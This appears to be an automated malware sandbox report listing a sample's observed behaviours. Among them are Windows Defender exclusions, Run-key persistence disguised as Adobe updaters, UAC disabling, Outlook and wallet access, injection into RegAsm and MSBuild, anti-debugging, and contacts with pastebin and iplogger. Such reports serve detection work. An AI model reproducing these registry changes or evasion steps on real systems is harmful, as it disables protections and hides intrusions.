Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF2E05D5-4FD3-47D4-B502-6AF23DFF1CF5}\InProcServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF2E05D5-4FD3-47D4-B502-6AF23DFF1CF5}\InProcServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F148A78C-91B1-45DC-83A9-291108F3B245}\InProcServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2ED38AC-BD32-4164-BB38-30573675E8D5}\LocalServer32 incinerator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2ED38AC-BD32-4164-BB38-30573675E8D5}\LocalServer32\ = "C:\\Program Files\\iolo technologies\\System Mechanic\\incinerator.exe" incinerator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9081C77F-9FAF-4551-A878-10A4249CD1FA}\InProcServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E8215BEA-3290-4C73-964B-75502B9B41B2}\InProcServer32\ = "C:\\Program Files\\iolo technologies\\System Mechanic\\Incinerator.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D90EF6CF-32CB-476D-B57C-1A71E58E8301}\InprocServer32\ = "C:\\Program Files\\iolo technologies\\System Mechanic\\Incinerator.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D90EF6CF-32CB-476D-B57C-1A71E58E8301}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9081C77F-9FAF-4551-A878-10A4249CD1FA}\InProcServer32\ = "C:\\Program Files\\iolo technologies\\System Mechanic\\Incinerator.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF2E05D5-4FD3-47D4-B502-6AF23DFF1CF5}\InProcServer32\ = "C:\\Program Files\\iolo technologies\\System Mechanic\\Incinerator.dll" regsvr32.exe -
Processes:
resource yara_rule behavioral1/memory/2432-127-0x0000000140000000-0x0000000140712000-memory.dmp themida C:\Users\Admin\Desktop\v4_file_x86x64\file.exe themida behavioral1/memory/2432-143-0x0000000140000000-0x0000000140712000-memory.dmp themida C:\Users\Admin\Documents\SimpleAdobe\AnDuBYZ639CmLSQ8NUtablTR.exe themida behavioral1/memory/2432-279-0x0000000140000000-0x0000000140712000-memory.dmp themida C:\Users\Admin\Documents\SimpleAdobe\lvwWiigbPRQHkX1WiI1R7O9N.exe themida behavioral1/memory/2432-354-0x0000000140000000-0x0000000140712000-memory.dmp themida behavioral1/memory/4336-369-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/3500-373-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/4336-366-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/4336-374-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/3500-381-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/3500-390-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/3500-415-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/3500-434-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/4336-432-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/3500-441-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/4336-439-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/3500-396-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/4336-414-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/4336-395-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/4336-391-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/3500-388-0x0000000000B40000-0x000000000110B000-memory.dmp themida behavioral1/memory/4336-383-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/2432-544-0x0000000140000000-0x0000000140712000-memory.dmp themida behavioral1/memory/4336-552-0x0000000001170000-0x00000000017DE000-memory.dmp themida behavioral1/memory/3500-560-0x0000000000B40000-0x000000000110B000-memory.dmp themida C:\Users\Admin\AppData\Local\hozFDwgIyzqHdPoa0p4OIKwH.exe themida -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 45.155.250.90 -
Processes:
tboJHJHII9Q9oJjVSOI6pAdI.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\tboJHJHII9Q9oJjVSOI6pAdI.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" tboJHJHII9Q9oJjVSOI6pAdI.exe -
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
Processes:
AnDuBYZ639CmLSQ8NUtablTR.exeHeIaw9JVr_srPOb759oFOk3h.exeYeIXGSxWKaTAiDgamD7WXkA9.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AnDuBYZ639CmLSQ8NUtablTR.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HeIaw9JVr_srPOb759oFOk3h.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HeIaw9JVr_srPOb759oFOk3h.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HeIaw9JVr_srPOb759oFOk3h.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 YeIXGSxWKaTAiDgamD7WXkA9.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 YeIXGSxWKaTAiDgamD7WXkA9.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 YeIXGSxWKaTAiDgamD7WXkA9.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AnDuBYZ639CmLSQ8NUtablTR.exe Key opened \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AnDuBYZ639CmLSQ8NUtablTR.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
Hst3lrLxOp00o64vOZXF5TK2.exeAnDuBYZ639CmLSQ8NUtablTR.exeexplorta.exetboJHJHII9Q9oJjVSOI6pAdI.exeYeIXGSxWKaTAiDgamD7WXkA9.execsrss.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" Hst3lrLxOp00o64vOZXF5TK2.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_999e43077df71fdfc52bd5232a22cf9d = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_999e43077df71fdfc52bd5232a22cf9d\\AdobeUpdaterV131.exe" AnDuBYZ639CmLSQ8NUtablTR.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae\\AdobeUpdaterV131.exe" AnDuBYZ639CmLSQ8NUtablTR.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7\\AdobeUpdaterV131.exe" AnDuBYZ639CmLSQ8NUtablTR.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\41759ac5d4.exe = "C:\\Users\\Admin\\1000013002\\41759ac5d4.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\6c91c65dee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\6c91c65dee.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" AnDuBYZ639CmLSQ8NUtablTR.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\\AdobeUpdaterV1.exe" YeIXGSxWKaTAiDgamD7WXkA9.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
file.exelvwWiigbPRQHkX1WiI1R7O9N.exefile300un.exemCUeMQ8aJkwBepz5YFcMFeyX.exeBmGFwn4X2slFd0x3BwDVZ8IA.exeB96dzdI5a3rTJ0MbwR8vdyO5.exeAnDuBYZ639CmLSQ8NUtablTR.exeTh1PUhyarSTHgHGJTc10cwE0.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lvwWiigbPRQHkX1WiI1R7O9N.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mCUeMQ8aJkwBepz5YFcMFeyX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BmGFwn4X2slFd0x3BwDVZ8IA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B96dzdI5a3rTJ0MbwR8vdyO5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AnDuBYZ639CmLSQ8NUtablTR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Th1PUhyarSTHgHGJTc10cwE0.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops Chrome extension 5 IoCs
Processes:
XAafaZk.exelvwWiigbPRQHkX1WiI1R7O9N.exeCCtCNtF.exevJkRBwz.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json XAafaZk.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\odclajchhopeklkiekamigakopnkflom\1.0.6_0\manifest.json lvwWiigbPRQHkX1WiI1R7O9N.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json CCtCNtF.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json CCtCNtF.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json vJkRBwz.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
gZfYynT.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini gZfYynT.exe -
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
7MIpvZeCZgl5ZPeAuQtK9vkn.exe7MIpvZeCZgl5ZPeAuQtK9vkn.exepoH7LiwSXsBgm1pfVmOtFOU9.exedescription ioc process File opened (read-only) \??\D: 7MIpvZeCZgl5ZPeAuQtK9vkn.exe File opened (read-only) \??\F: 7MIpvZeCZgl5ZPeAuQtK9vkn.exe File opened (read-only) \??\D: 7MIpvZeCZgl5ZPeAuQtK9vkn.exe File opened (read-only) \??\F: 7MIpvZeCZgl5ZPeAuQtK9vkn.exe File opened (read-only) \??\D: poH7LiwSXsBgm1pfVmOtFOU9.exe File opened (read-only) \??\F: poH7LiwSXsBgm1pfVmOtFOU9.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
Processes:
flow ioc 522 pastebin.com 1332 pastebin.com 7352 pastebin.com 132 iplogger.org 5413 iplogger.org 133 iplogger.org 5788 iplogger.org 192 iplogger.org 193 iplogger.org 523 pastebin.com 1333 pastebin.com 5412 iplogger.org 5787 iplogger.org 7377 pastebin.com -
Looks up external IP address via web service 26 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 150 api.myip.com 247 ip-api.com 484 ipinfo.io 584 api.myip.com 199 ipinfo.io 443 ipinfo.io 24 ipinfo.io 153 ipinfo.io 6308 ipinfo.io 483 ipinfo.io 585 ipinfo.io 6306 ipinfo.io 485 ipinfo.io 5555 ipinfo.io 168 ipinfo.io 250 ipinfo.io 251 ipinfo.io 444 ipinfo.io 5517 api.myip.com 21 api.myip.com 25 ipinfo.io 154 ipinfo.io 583 api.myip.com 5533 api.myip.com 5557 ipinfo.io 22 api.myip.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\span37O_exJK0ZDM\xpdQqUQXQWa0iRQg0uFa.exe autoit_exe C:\Users\Admin\1000013002\41759ac5d4.exe autoit_exe -
Drops file in System32 directory 64 IoCs
Processes:
powershell.exeB96dzdI5a3rTJ0MbwR8vdyO5.exelvwWiigbPRQHkX1WiI1R7O9N.exegZfYynT.exepowershell.exeCCtCNtF.exepowershell.exerundll32.exemCUeMQ8aJkwBepz5YFcMFeyX.exevJkRBwz.exepowershell.exepowershell.exebYrKICR.exepowershell.exepowershell.exepowershell.exepowershell.exefile.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI B96dzdI5a3rTJ0MbwR8vdyO5.exe File opened for modification C:\Windows\System32\GroupPolicy lvwWiigbPRQHkX1WiI1R7O9N.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini gZfYynT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI mCUeMQ8aJkwBepz5YFcMFeyX.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol mCUeMQ8aJkwBepz5YFcMFeyX.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vJkRBwz.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol lvwWiigbPRQHkX1WiI1R7O9N.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1D54DE53BDE89F59AF362E74369EB397 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_FAD4FA4BE5EA6E868132040E668F6C95 CCtCNtF.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 CCtCNtF.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini mCUeMQ8aJkwBepz5YFcMFeyX.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bYrKICR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol gZfYynT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1D54DE53BDE89F59AF362E74369EB397 CCtCNtF.exe File opened for modification C:\Windows\System32\GroupPolicy B96dzdI5a3rTJ0MbwR8vdyO5.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini B96dzdI5a3rTJ0MbwR8vdyO5.exe File opened for modification C:\Windows\System32\GroupPolicy file.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy mCUeMQ8aJkwBepz5YFcMFeyX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol B96dzdI5a3rTJ0MbwR8vdyO5.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI file.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_F035812844FEE93DCDCC1CD3A7F24400 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bYrKICR.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol file.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat vJkRBwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI lvwWiigbPRQHkX1WiI1R7O9N.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_F035812844FEE93DCDCC1CD3A7F24400 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_FAD4FA4BE5EA6E868132040E668F6C95 CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache CCtCNtF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
Processes:
file.exelvwWiigbPRQHkX1WiI1R7O9N.exejjuuAXZz7uWvEL2tOnUS.exeexplorta.exeRqmEgRdyoc4TnpGWtipi.exeamert.exe6c91c65dee.exeexplorta.exechrosha.exemCUeMQ8aJkwBepz5YFcMFeyX.exeexplorta.exeexplorta.exeexplorta.exeexplorta.exeexplorta.exeBmGFwn4X2slFd0x3BwDVZ8IA.exeexplorta.exeexplorta.exeB96dzdI5a3rTJ0MbwR8vdyO5.exepid process 2432 file.exe 3500 lvwWiigbPRQHkX1WiI1R7O9N.exe 1728 jjuuAXZz7uWvEL2tOnUS.exe 6060 explorta.exe 5752 RqmEgRdyoc4TnpGWtipi.exe 4332 amert.exe 6216 6c91c65dee.exe 3172 explorta.exe 1036 chrosha.exe 4480 mCUeMQ8aJkwBepz5YFcMFeyX.exe 3552 explorta.exe 7208 explorta.exe 5372 explorta.exe 6572 explorta.exe 7136 explorta.exe 8920 BmGFwn4X2slFd0x3BwDVZ8IA.exe 5232 explorta.exe 656 explorta.exe 8180 B96dzdI5a3rTJ0MbwR8vdyO5.exe -
Suspicious use of SetThreadContext 19 IoCs
Processes:
luhXBiuEvI6m3KxAsSfTpgok.exezlbyhhvqluAa2YWd57tl7eT_.exerun.exedckuybanmlgp.exeDOwOUFOet7eMC5vx2MOYygTD.exesqfngwrn.execmd.exeswiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.execmd.exerun.execmd.exex8czyfkmmCzRCnptPtoRIMT4.execNfT86s447KaBzQurj9awdEl.exedescription pid process target process PID 2708 set thread context of 4564 2708 luhXBiuEvI6m3KxAsSfTpgok.exe RegAsm.exe PID 4756 set thread context of 2540 4756 zlbyhhvqluAa2YWd57tl7eT_.exe RegAsm.exe PID 192 set thread context of 1520 192 run.exe cmd.exe PID 5596 set thread context of 5756 5596 dckuybanmlgp.exe conhost.exe PID 5596 set thread context of 5900 5596 dckuybanmlgp.exe svchost.exe PID 2572 set thread context of 6068 2572 DOwOUFOet7eMC5vx2MOYygTD.exe MsBuild.exe PID 2412 set thread context of 5916 2412 sqfngwrn.exe svchost.exe PID 1520 set thread context of 2708 1520 cmd.exe MSBuild.exe PID 5288 set thread context of 5392 5288 swiiiii.exe RegAsm.exe PID 5668 set thread context of 6260 5668 alexxxxxxxx.exe RegAsm.exe PID 3008 set thread context of 6972 3008 gold.exe RegAsm.exe PID 7272 set thread context of 7352 7272 swiiii.exe RegAsm.exe PID 7476 set thread context of 7772 7476 file300un.exe jsc.exe PID 7332 set thread context of 7736 7332 run.exe cmd.exe PID 7736 set thread context of 9004 7736 cmd.exe MSBuild.exe PID 6836 set thread context of 5600 6836 run.exe cmd.exe PID 5600 set thread context of 2560 5600 cmd.exe MSBuild.exe PID 5308 set thread context of 5004 5308 x8czyfkmmCzRCnptPtoRIMT4.exe RegAsm.exe PID 6508 set thread context of 7456 6508 cNfT86s447KaBzQurj9awdEl.exe RegAsm.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 6 IoCs
